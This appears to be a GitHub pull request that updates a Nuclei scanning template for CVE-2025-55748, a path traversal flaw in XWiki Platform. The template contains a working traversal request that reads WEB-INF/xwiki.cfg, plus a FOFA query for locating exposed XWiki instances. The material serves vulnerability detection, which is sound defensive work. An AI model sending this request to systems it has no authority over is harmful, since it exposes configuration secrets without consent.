### PR TITLE
Added CVE-2025-55748.yaml

### DIFF
--- a/http/cves/2025/CVE-2025-55748.yaml
+++ b/http/cves/2025/CVE-2025-55748.yaml
@@ -1,13 +1,18 @@
 id: CVE-2025-55748
 
 info:
-  name: XWiki Path Traversal
+  name: XWiki Platform - Path Traversal
   author: Redmomn
   severity: high
   description: |
-    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 4.2-milestone-2 through 16.10.6, configuration files are accessible through jsx and sx endpoints. It's possible to access and read configuration files by using URLs such as `http://localhost:8080/bin/ssx/Main/WebHome?resource=../../WEB-INF/xwiki.cfg&minify=false`. This is fixed in version 16.10.7.
+    XWiki Platform 4.2-milestone-2 through 16.10.6 contains a path traversal caused by improper access control in jsx and sx endpoints, letting remote attackers read configuration files, exploit requires no special privileges.
+  impact: |
+    Remote attackers can read sensitive configuration files, potentially exposing critical system information.
+  remediation: |
+    Upgrade to version 16.10.7 or later.
   reference:
-    - https://jira.xwiki.org/browse/XWIKI-23109
+    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-m63c-3rmg-r2cf
+    - https://github.com/xwiki/xwiki-platform/commit/9e7b4c03f2143978d891109a17159f73d4cdd318#diff-ee78930a9ac5ea586179fe8ab88a5fd58e369d175927d1e88a0b4dbc3ebcbf1eR62
     - https://nvd.nist.gov/vuln/detail/CVE-2025-55748
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@@ -15,21 +20,19 @@ info:
     cve-id: CVE-2025-55748
     cwe-id: CWE-23
   metadata:
+    verified: true
+    max-request: 1
     fofa-query: app="XWIKI-Platform"
-  tags: xwiki,file-read,cve
+  tags: cve,cve2025,xwiki,lfi
+
 http:
   - method: GET
     path:
       - '{{BaseURL}}/bin/ssx/Main/WebHome?resource=../../WEB-INF/xwiki.cfg&minify=false'
-    matchers-condition: and
+
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "xwiki.editcomment=","xwiki.plugins=","xwiki.encoding=")'
+          - 'status_code == 200'
         condition: and
-        words:
-          - 'xwiki.editcomment='
-          - 'xwiki.plugins='
-          - 'xwiki.encoding='


### PR DESCRIPTION
Added CVE-2025-55748 entry for XWiki Path Traversal vulnerability.

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

<img width="1091" height="381" alt="image" src="https://github.com/user-attachments/assets/8b9305bf-39de-4b27-aad8-b3431b8d3d34" />

<img width="912" height="668" alt="image" src="https://github.com/user-attachments/assets/59805972-19ed-4f07-a16a-ed226f83fe26" />


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)